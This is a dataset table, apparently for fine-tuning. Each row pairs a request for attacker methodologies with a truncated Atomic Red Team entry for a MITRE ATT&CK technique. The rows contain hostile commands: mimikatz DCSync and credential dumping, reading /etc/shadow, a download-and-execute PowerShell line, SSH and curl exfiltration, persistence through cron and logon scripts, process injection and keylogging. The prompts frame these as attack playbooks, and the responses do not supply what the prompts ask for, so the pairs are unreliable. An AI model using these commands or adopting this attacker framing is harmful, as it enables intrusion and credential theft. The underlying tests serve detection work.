instruction stringlengths 87 229 | response stringlengths 192 60.5k | source stringclasses 4
values | technique stringlengths 5 109 |
|---|---|---|---|
MITRE T1003.006: OS Credential Dumping: DCSync — Give 3 different attacker methodologies. For each: exact commands, payloads, and evasion. | # MITRE T1003.006: OS Credential Dumping: DCSync
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: DCSync (Active Directory)
**Executor**: command_prompt
**Command**:
```
#{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit"
```
### Test 2: Run ... | ART | T1003.006 |
Attacker perspective on MITRE T1003.007: OS Credential Dumping: Proc Filesystem: Give 4+ methods with step-by-step instructions and code samples. | # MITRE T1003.007: OS Credential Dumping: Proc Filesystem
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Dump individual process memory with sh (Local)
**Executor**: sh
**Command**:
```
sh #{script_path}
PID=$(pgrep -n -f "#{pid_term}")
HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /... | ART | T1003.007 |
Red team: MITRE T1003.008: OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow. List 5 exploitation approaches with: reconnaissance, technique, PoC code. | # MITRE T1003.008: OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Access /etc/shadow (Local)
**Executor**: bash
**Command**:
```
sudo cat /etc/shadow > #{output_file}
cat #{output_file}
```
**Cleanup**:... | ART | T1003.008 |
TARGET: MITRE T1005: Data from Local System. Provide 3 distinct attack approaches:
1. Initial vector
2. Exploitation method
3. Payload/PoC
4. Evasion technique | # MITRE T1005: Data from Local System
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Search files of interest and save them to a single zip file (Windows)
**Executor**: powershell
**Command**:
```
$startingDirectory = "#{starting_directory}"
$outputZip = "#{output_zip_fold... | ART | T1005 |
Red team: MITRE T1006: Direct Volume Access. List 3 exploitation approaches with: reconnaissance, technique, PoC code. | # MITRE T1006: Direct Volume Access
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Read volume boot sector via DOS device path (PowerShell)
**Executor**: powershell
**Command**:
```
$buffer = New-Object byte[] 11
$handle = New-Object IO.FileStream "\\.\#{volume}", 'Open', ... | ART | T1006 |
MITRE T1007: System Service Discovery — Give 8 different attacker methodologies. For each: exact commands, payloads, and evasion. | # MITRE T1007: System Service Discovery
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: System Service Discovery
**Executor**: command_prompt
**Command**:
```
tasklist.exe /svc
sc query
sc query state= all
```
### Test 2: System Service Discovery - net.exe
**Executor**: co... | ART | T1007 |
MITRE T1010: Application Window Discovery — Give 3 different attacker methodologies. For each: exact commands, payloads, and evasion. | # MITRE T1010: Application Window Discovery
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: List Process Main Windows - C# .NET
**Executor**: command_prompt
**Command**:
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} "#{input_source_code}... | ART | T1010 |
MITRE T1012: Query Registry exploitation: provide 6+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit. | # MITRE T1012: Query Registry
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Query Registry
**Executor**: command_prompt
**Command**:
```
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServi... | ART | T1012 |
MITRE T1014: Rootkit exploitation: provide 4+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit. | # MITRE T1014: Rootkit
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Loadable Kernel Module based Rootkit
**Executor**: sh
**Command**:
```
sudo insmod #{rootkit_path}/#{rootkit_name}.ko
```
**Cleanup**:
```
sudo rmmod #{rootkit_name}
sudo rm -rf #{rootkit_path}
```
### ... | ART | T1014 |
MITRE T1016: System Network Configuration Discovery: What are 9 proven attack paths? Detail each with tools, commands, payloads. | # MITRE T1016: System Network Configuration Discovery
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: System Network Configuration Discovery on Windows
**Executor**: command_prompt
**Command**:
```
ipconfig /all
netsh interface show interface
arp -a
nbtstat -n
net config
``... | ART | T1016 |
MITRE T1016.001: System Network Configuration Discovery: Internet Connection Discovery exploitation: provide 5+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit. | # MITRE T1016.001: System Network Configuration Discovery: Internet Connection Discovery
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Check internet connection using ping Windows
**Executor**: command_prompt
**Command**:
```
ping -n 4 #{ping_target}
```
### Test 2: Chec... | ART | T1016.001 |
MITRE T1016.002: System Network Configuration Discovery: Wi-Fi Discovery — Give 3 different attacker methodologies. For each: exact commands, payloads, and evasion. | # MITRE T1016.002: System Network Configuration Discovery: Wi-Fi Discovery
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Enumerate Stored Wi-Fi Profiles And Passwords via netsh
**Executor**: command_prompt
**Command**:
```
netsh wlan show profile * key=clear
``` | ART | T1016.002 |
Attacker perspective on MITRE T1018: Remote System Discovery: Give 22+ methods with step-by-step instructions and code samples. | # MITRE T1018: Remote System Discovery
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Remote System Discovery - net
**Executor**: command_prompt
**Command**:
```
net view /domain
net view
```
### Test 2: Remote System Discovery - net group Domain Computers
**Executor**: c... | ART | T1018 |
Red team: MITRE T1020: Automated Exfiltration. List 3 exploitation approaches with: reconnaissance, technique, PoC code. | # MITRE T1020: Automated Exfiltration
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: IcedID Botnet HTTP PUT
**Executor**: powershell
**Command**:
```
$fileName = "#{file}"
$url = "#{domain}"
$file = New-Item -Force $fileName -Value "This is ART IcedID Botnet Exfil Test"
$c... | ART | T1020 |
TARGET: MITRE T1021.001: Remote Services: Remote Desktop Protocol. Provide 4 distinct attack approaches:
1. Initial vector
2. Exploitation method
3. Payload/PoC
4. Evasion technique | # MITRE T1021.001: Remote Services: Remote Desktop Protocol
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: RDP to DomainController
**Executor**: powershell
**Command**:
```
$Server=#{logonserver}
$User = Join-Path #{domain} #{username}
$Password="#{password}"
cmdkey /gener... | ART | T1021.001 |
MITRE T1021.002: Remote Services: SMB/Windows Admin Shares: What are 4 proven attack paths? Detail each with tools, commands, payloads. | # MITRE T1021.002: Remote Services: SMB/Windows Admin Shares
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Map admin share
**Executor**: command_prompt
**Command**:
```
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
```
### Test 2: Map ... | ART | T1021.002 |
Red team: MITRE T1021.003: Remote Services: Distributed Component Object Model. List 3 exploitation approaches with: reconnaissance, technique, PoC code. | # MITRE T1021.003: Remote Services: Distributed Component Object Model
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: PowerShell Lateral Movement using MMC20
**Executor**: powershell
**Command**:
```
[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application"... | ART | T1021.003 |
Attacker perspective on MITRE T1021.004: Remote Services: SSH: Give 3+ methods with step-by-step instructions and code samples. | # MITRE T1021.004: Remote Services: SSH
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: ESXi - Enable SSH via PowerCLI
**Executor**: powershell
**Command**:
```
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIS... | ART | T1021.004 |
MITRE T1021.005: Remote Services:VNC: What are 3 proven attack paths? Detail each with tools, commands, payloads. | # MITRE T1021.005: Remote Services:VNC
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Enable Apple Remote Desktop Agent
**Executor**: sh
**Command**:
```
sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -allo... | ART | T1021.005 |
Attacker perspective on MITRE T1021.006: Remote Services: Windows Remote Management: Give 3+ methods with step-by-step instructions and code samples. | # MITRE T1021.006: Remote Services: Windows Remote Management
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Enable Windows Remote Management
**Executor**: powershell
**Command**:
```
Enable-PSRemoting -Force
```
### Test 2: Remote Code Execution with PS Credentials Using... | ART | T1021.006 |
Red team: MITRE T1025: Data from Removable Media. List 3 exploitation approaches with: reconnaissance, technique, PoC code. | # MITRE T1025: Data from Removable Media
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Identify Documents on USB and Removable Media via PowerShell
**Executor**: command_prompt
**Command**:
```
powershell.exe -c "Get-Volume | Where-Object {$_.DriveType -eq 'Removable'} | ... | ART | T1025 |
Attacker perspective on MITRE T1027: Obfuscated Files or Information: Give 9+ methods with step-by-step instructions and code samples. | # MITRE T1027: Obfuscated Files or Information
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Decode base64 Data into Script
**Executor**: sh
**Command**:
```
if [ "$(uname)" = 'FreeBSD' ]; then cmd="b64decode -r"; else cmd="base64 -d"; fi;
cat /tmp/encoded.dat | $cmd > /t... | ART | T1027 |
MITRE T1027.001: Obfuscated Files or Information: Binary Padding exploitation: provide 3+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit. | # MITRE T1027.001: Obfuscated Files or Information: Binary Padding
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Pad Binary to Change Hash - Linux/macOS dd
**Executor**: sh
**Command**:
```
dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} #adds null bytes
dd if=/dev/random ... | ART | T1027.001 |
Red team: MITRE T1027.002: Obfuscated Files or Information: Software Packing. List 4 exploitation approaches with: reconnaissance, technique, PoC code. | # MITRE T1027.002: Obfuscated Files or Information: Software Packing
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Binary simply packed by UPX (linux)
**Executor**: sh
**Command**:
```
cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
```
**Cleanup**:
```
rm /tmp/packed_b... | ART | T1027.002 |
Red team: MITRE T1027.004: Obfuscated Files or Information: Compile After Delivery. List 5 exploitation approaches with: reconnaissance, technique, PoC code. | # MITRE T1027.004: Obfuscated Files or Information: Compile After Delivery
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Compile After Delivery using csc.exe
**Executor**: command_prompt
**Command**:
```
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{outpu... | ART | T1027.004 |
Attacker perspective on MITRE T1027.006: HTML Smuggling: Give 3+ methods with step-by-step instructions and code samples. | # MITRE T1027.006: HTML Smuggling
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: HTML Smuggling Remote Payload
**Executor**: powershell
**Command**:
```
& "PathToAtomicsFolder\T1027.006\bin\T1027_006_remote.html"
```
**Cleanup**:
```
$user = [System.Environment]::UserName;... | ART | T1027.006 |
Red team: MITRE T1027.007: Obfuscated Files or Information: Dynamic API Resolution. List 3 exploitation approaches with: reconnaissance, technique, PoC code. | # MITRE T1027.007: Obfuscated Files or Information: Dynamic API Resolution
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Dynamic API Resolution-Ninja-syscall
**Executor**: powershell
**Command**:
```
Start-Process "#{exe_binary}"
Start-Sleep -Seconds 7
if (Test-Path "C:\U... | ART | T1027.007 |
MITRE T1027.013: Obfuscated Files or Information: Encrypted/Encoded File — Give 3 different attacker methodologies. For each: exact commands, payloads, and evasion. | # MITRE T1027.013: Obfuscated Files or Information: Encrypted/Encoded File
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Decode Eicar File and Write to File
**Executor**: powershell
**Command**:
```
$encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJ... | ART | T1027.013 |
MITRE T1030: Data Transfer Size Limits: What are 3 proven attack paths? Detail each with tools, commands, payloads. | # MITRE T1030: Data Transfer Size Limits
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Data Transfer Size Limits
**Executor**: sh
**Command**:
```
cd #{folder_path}; split -b 5000000 #{file_name}
ls -l #{folder_path}
```
**Cleanup**:
```
if [ -f #{folder_path}/safe_to_del... | ART | T1030 |
TARGET: MITRE T1033: System Owner/User Discovery. Provide 7 distinct attack approaches:
1. Initial vector
2. Exploitation method
3. Payload/PoC
4. Evasion technique | # MITRE T1033: System Owner/User Discovery
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: System Owner/User Discovery
**Executor**: command_prompt
**Command**:
```
cmd.exe /C whoami
wmic useraccount get /ALL
quser /SERVER:"#{computer_name}"
quser
qwinsta.exe /server:#{comp... | ART | T1033 |
Red team: MITRE T1036: Masquerading. List 3 exploitation approaches with: reconnaissance, technique, PoC code. | # MITRE T1036: Masquerading
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: System File Copied to Unusual Location
**Executor**: powershell
**Command**:
```
copy-item "$env:windir\System32\cmd.exe" -destination "$env:allusersprofile\cmd.exe"
start-process "$env:allusersprof... | ART | T1036 |
MITRE T1036.003: Masquerading: Rename System Utilities — Give 8 different attacker methodologies. For each: exact commands, payloads, and evasion. | # MITRE T1036.003: Masquerading: Rename System Utilities
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Masquerading as Windows LSASS process
**Executor**: command_prompt
**Command**:
```
copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
%SystemRoot%\Temp\lsas... | ART | T1036.003 |
Red team: MITRE T1036.004: Masquerading: Masquerade Task or Service. List 4 exploitation approaches with: reconnaissance, technique, PoC code. | # MITRE T1036.004: Masquerading: Masquerade Task or Service
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Creating W32Time similar named service using schtasks
**Executor**: command_prompt
**Command**:
```
schtasks /create /ru system /sc daily /tr "cmd /c powershell.exe -... | ART | T1036.004 |
MITRE T1036.005: Masquerading: Match Legitimate Name or Location — Give 3 different attacker methodologies. For each: exact commands, payloads, and evasion. | # MITRE T1036.005: Masquerading: Match Legitimate Name or Location
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Execute a process from a directory masquerading as the current parent directory
**Executor**: sh
**Command**:
```
mkdir $HOME/...
cp $(which sh) $HOME/...
$HOM... | ART | T1036.005 |
MITRE T1036.006: Masquerading: Space after Filename exploitation: provide 3+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit. | # MITRE T1036.006: Masquerading: Space after Filename
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Space After Filename
**Executor**: sh
**Command**:
```
mkdir -p /tmp/atomic-test-T1036.006
cd /tmp/atomic-test-T1036.006
mkdir -p 'testdirwithspaceend '
[ "$(uname)" = 'Fre... | ART | T1036.006 |
MITRE T1036.007: Masquerading: Double File Extension: What are 3 proven attack paths? Detail each with tools, commands, payloads. | # MITRE T1036.007: Masquerading: Double File Extension
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: File Extension Masquerading
**Executor**: command_prompt
**Command**:
```
copy "#{exe_path}" %temp%\T1036.007_masquerading.docx.exe /Y
copy "#{exe_path}" %temp%\T1036.007_... | ART | T1036.007 |
TARGET: MITRE T1037.001: Boot or Logon Initialization Scripts: Logon Script (Windows). Provide 3 distinct attack approaches:
1. Initial vector
2. Exploitation method
3. Payload/PoC
4. Evasion technique | # MITRE T1037.001: Boot or Logon Initialization Scripts: Logon Script (Windows)
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Logon Scripts
**Executor**: command_prompt
**Command**:
```
echo "#{script_command}" > #{script_path}
REG.exe ADD HKCU\Environment /v UserInitMprL... | ART | T1037.001 |
TARGET: MITRE T1037.004: Boot or Logon Initialization Scripts: Rc.common. Provide 3 distinct attack approaches:
1. Initial vector
2. Exploitation method
3. Payload/PoC
4. Evasion technique | # MITRE T1037.004: Boot or Logon Initialization Scripts: Rc.common
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: rc.common
**Executor**: bash
**Command**:
```
sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common
```
### Test 2: rc.... | ART | T1037.004 |
Red team: MITRE T1037.005: Boot or Logon Initialization Scripts: Startup Items. List 3 exploitation approaches with: reconnaissance, technique, PoC code. | # MITRE T1037.005: Boot or Logon Initialization Scripts: Startup Items
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Add file to Local Library StartupItems
**Executor**: sh
**Command**:
```
sudo touch /Library/StartupItems/EvilStartup.plist
```
**Cleanup**:
```
sudo rm /L... | ART | T1037.005 |
Attacker perspective on MITRE T1039: Data from Network Shared Drive: Give 3+ methods with step-by-step instructions and code samples. | # MITRE T1039: Data from Network Shared Drive
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Copy a sensitive File over Administrative share with copy
**Executor**: command_prompt
**Command**:
```
copy \\#{remote}\C$\#{share_file} %TEMP%\#{local_file}
```
**Cleanup**:
```
... | ART | T1039 |
MITRE T1040: Network Sniffing — Give 16 different attacker methodologies. For each: exact commands, payloads, and evasion. | # MITRE T1040: Network Sniffing
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Packet Capture Linux using tshark or tcpdump
**Executor**: bash
**Command**:
```
tcpdump -c 5 -nnni #{interface}
tshark -c 5 -i #{interface}
```
### Test 2: Packet Capture FreeBSD using tshark ... | ART | T1040 |
Red team: MITRE T1041: Exfiltration Over C2 Channel. List 3 exploitation approaches with: reconnaissance, technique, PoC code. | # MITRE T1041: Exfiltration Over C2 Channel
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: C2 Data Exfiltration
**Executor**: powershell
**Command**:
```
if(-not (Test-Path #{filepath})){
1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." ... | ART | T1041 |
Attacker perspective on MITRE T1046: Network Service Discovery: Give 12+ methods with step-by-step instructions and code samples. | # MITRE T1046: Network Service Discovery
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Port Scan
**Executor**: bash
**Command**:
```
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
```
### Test 2: Port Scan Nmap
**E... | ART | T1046 |
MITRE T1047: Windows Management Instrumentation: What are 10 proven attack paths? Detail each with tools, commands, payloads. | # MITRE T1047: Windows Management Instrumentation
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: WMI Reconnaissance Users
**Executor**: command_prompt
**Command**:
```
wmic useraccount get /ALL /format:csv
```
### Test 2: WMI Reconnaissance Processes
**Executor**: command... | ART | T1047 |
MITRE T1048: Exfiltration Over Alternative Protocol exploitation: provide 4+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit. | # MITRE T1048: Exfiltration Over Alternative Protocol
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Exfiltration Over Alternative Protocol - SSH
**Executor**: sh
**Command**:
```
ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
```
### Test 2: Exfiltration Over ... | ART | T1048 |
Red team: MITRE T1048.002: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol. List 4 exploitation approaches with: reconnaissance, technique, PoC code. | # MITRE T1048.002: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Exfiltrate data HTTPS using curl windows
**Executor**: command_prompt
**Command**:
```
#{curl_path} -k -F "file... | ART | T1048.002 |
MITRE T1048.003: Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol — Give 6 different attacker methodologies. For each: exact commands, payloads, and evasion. | # MITRE T1048.003: Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Exfiltration Over Alternative Protocol - ICMP
**Executor**: powershell
**Command**:
```
$ping = New-Object Sys... | ART | T1048.003 |
MITRE T1049: System Network Connections Discovery exploitation: provide 7+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit. | # MITRE T1049: System Network Connections Discovery
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: System Network Connections Discovery
**Executor**: command_prompt
**Command**:
```
netstat -ano
net use
net sessions 2>nul
```
### Test 2: System Network Connections Discove... | ART | T1049 |
Attacker perspective on MITRE T1053.002: Scheduled Task/Job: At: Give 3+ methods with step-by-step instructions and code samples. | # MITRE T1053.002: Scheduled Task/Job: At
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: At.exe Scheduled task
**Executor**: command_prompt
**Command**:
```
at 13:20 /interactive cmd
```
### Test 2: At - Schedule a job
**Executor**: sh
**Command**:
```
echo "#{at_command}... | ART | T1053.002 |
MITRE T1053.003: Scheduled Task/Job: Cron: What are 4 proven attack paths? Detail each with tools, commands, payloads. | # MITRE T1053.003: Scheduled Task/Job: Cron
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Cron - Replace crontab with referenced file
**Executor**: sh
**Command**:
```
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
```
**Cleanup... | ART | T1053.003 |
Attacker perspective on MITRE T1053.005: Scheduled Task/Job: Scheduled Task: Give 12+ methods with step-by-step instructions and code samples. | # MITRE T1053.005: Scheduled Task/Job: Scheduled Task
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Scheduled Task Startup Script
**Executor**: command_prompt
**Command**:
```
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create ... | ART | T1053.005 |
MITRE T1053.006: Scheduled Task/Job: Systemd Timers — Give 3 different attacker methodologies. For each: exact commands, payloads, and evasion. | # MITRE T1053.006: Scheduled Task/Job: Systemd Timers
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Create Systemd Service and Timer
**Executor**: bash
**Command**:
```
echo "[Unit]" > #{path_to_systemd_service}
echo "Description=Atomic Red Team Systemd Timer Service" >> ... | ART | T1053.006 |
MITRE T1053.007: Kubernetes Cronjob — Give 3 different attacker methodologies. For each: exact commands, payloads, and evasion. | # MITRE T1053.007: Kubernetes Cronjob
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: ListCronjobs
**Executor**: bash
**Command**:
```
kubectl get cronjobs -n #{namespace}
```
### Test 2: CreateCronjob
**Executor**: bash
**Command**:
```
kubectl create -f src/cronjob.yaml ... | ART | T1053.007 |
Red team: MITRE T1055: Process Injection. List 13 exploitation approaches with: reconnaissance, technique, PoC code. | # MITRE T1055: Process Injection
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Shellcode execution via VBA
**Executor**: powershell
**Command**:
```
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com... | ART | T1055 |
MITRE T1055.001: Process Injection: Dynamic-link Library Injection — Give 3 different attacker methodologies. For each: exact commands, payloads, and evasion. | # MITRE T1055.001: Process Injection: Dynamic-link Library Injection
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Process Injection via mavinject.exe
**Executor**: powershell
**Command**:
```
$mypid = #{process_id}
mavinject $mypid /INJECTRUNNING "#{dll_payload}"
Stop-Pr... | ART | T1055.001 |
Attacker perspective on MITRE T1055.002: Process Injection: Portable Executable Injection: Give 3+ methods with step-by-step instructions and code samples. | # MITRE T1055.002: Process Injection: Portable Executable Injection
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Portable Executable Injection
**Executor**: powershell
**Command**:
```
Start-Process "#{exe_binary}"
Start-Sleep -Seconds 7
Get-Process -Name Notepad -ErrorA... | ART | T1055.002 |
MITRE T1055.003: Thread Execution Hijacking: What are 3 proven attack paths? Detail each with tools, commands, payloads. | # MITRE T1055.003: Thread Execution Hijacking
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Thread Execution Hijacking
**Executor**: powershell
**Command**:
```
$notepad = Start-Process notepad -passthru
Start-Process "$PathToAtomicsFolder\T1055.003\bin\InjectContext.exe"... | ART | T1055.003 |
MITRE T1055.004: Process Injection: Asynchronous Procedure Call exploitation: provide 3+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit. | # MITRE T1055.004: Process Injection: Asynchronous Procedure Call
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Process Injection via C#
**Executor**: command_prompt
**Command**:
```
"#{exe_binary}"
```
### Test 2: EarlyBird APC Queue Injection in Go
**Executor**: powers... | ART | T1055.004 |
MITRE T1055.011: Process Injection: Extra Window Memory Injection — Give 3 different attacker methodologies. For each: exact commands, payloads, and evasion. | # MITRE T1055.011: Process Injection: Extra Window Memory Injection
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Process Injection via Extra Window Memory (EWM) x64 executable
**Executor**: powershell
**Command**:
```
#{exe_binary}
```
**Cleanup**:
```
Get-Process -Name ... | ART | T1055.011 |
MITRE T1055.012: Process Injection: Process Hollowing exploitation: provide 4+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit. | # MITRE T1055.012: Process Injection: Process Hollowing
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Process Hollowing using PowerShell
**Executor**: powershell
**Command**:
```
. "#{script_path}"
$ppid=Get-Process #{parent_process_name} | select -expand id
Start-Hollow ... | ART | T1055.012 |
Red team: MITRE T1055.015: Process Injection: ListPlanting. List 3 exploitation approaches with: reconnaissance, technique, PoC code. | # MITRE T1055.015: Process Injection: ListPlanting
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Process injection ListPlanting
**Executor**: powershell
**Command**:
```
Start-Process "#{exe_binary}"
Start-Sleep -Seconds 7
Get-Process -Name Notepad -ErrorAction SilentlyCo... | ART | T1055.015 |
TARGET: MITRE T1056.001: Input Capture: Keylogging. Provide 8 distinct attack approaches:
1. Initial vector
2. Exploitation method
3. Payload/PoC
4. Evasion technique | # MITRE T1056.001: Input Capture: Keylogging
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Input Capture
**Executor**: powershell
**Command**:
```
&"$PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1" -LogPath #{filepath}
```
**Cleanup**:
```
Remove-Item $env:TEMP\key.... | ART | T1056.001 |
MITRE T1056.002: Input Capture: GUI Input Capture — Give 3 different attacker methodologies. For each: exact commands, payloads, and evasion. | # MITRE T1056.002: Input Capture: GUI Input Capture
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: AppleScript - Prompt User for Password
**Executor**: bash
**Command**:
```
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activ... | ART | T1056.002 |
MITRE T1056.004: Input Capture: Credential API Hooking — Give 3 different attacker methodologies. For each: exact commands, payloads, and evasion. | # MITRE T1056.004: Input Capture: Credential API Hooking
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Hook PowerShell TLS Encrypt/Decrypt Messages
**Executor**: powershell
**Command**:
```
mavinject $pid /INJECTRUNNING "#{file_name}"
Invoke-WebRequest #{server_name} -Use... | ART | T1056.004 |
Attacker perspective on MITRE T1057: Process Discovery: Give 9+ methods with step-by-step instructions and code samples. | # MITRE T1057: Process Discovery
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Process Discovery - ps
**Executor**: sh
**Command**:
```
ps >> #{output_file}
ps aux >> #{output_file}
```
**Cleanup**:
```
rm #{output_file}
```
### Test 2: Process Discovery - tasklist
**Exe... | ART | T1057 |
MITRE T1059: Command and Scripting Interpreter: What are 3 proven attack paths? Detail each with tools, commands, payloads. | # MITRE T1059: Command and Scripting Interpreter
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: AutoIt Script Execution
**Executor**: powershell
**Command**:
```
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
``` | ART | T1059 |
MITRE T1059.001: Command and Scripting Interpreter: PowerShell — Give 21 different attacker methodologies. For each: exact commands, payloads, and evasion. | # MITRE T1059.001: Command and Scripting Interpreter: PowerShell
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Mimikatz
**Executor**: command_prompt
**Command**:
```
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
``... | ART | T1059.001 |
MITRE T1059.002: Command and Scripting Interpreter: AppleScript exploitation: provide 3+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit. | # MITRE T1059.002: Command and Scripting Interpreter: AppleScript
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: AppleScript
**Executor**: sh
**Command**:
```
osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.... | ART | T1059.002 |
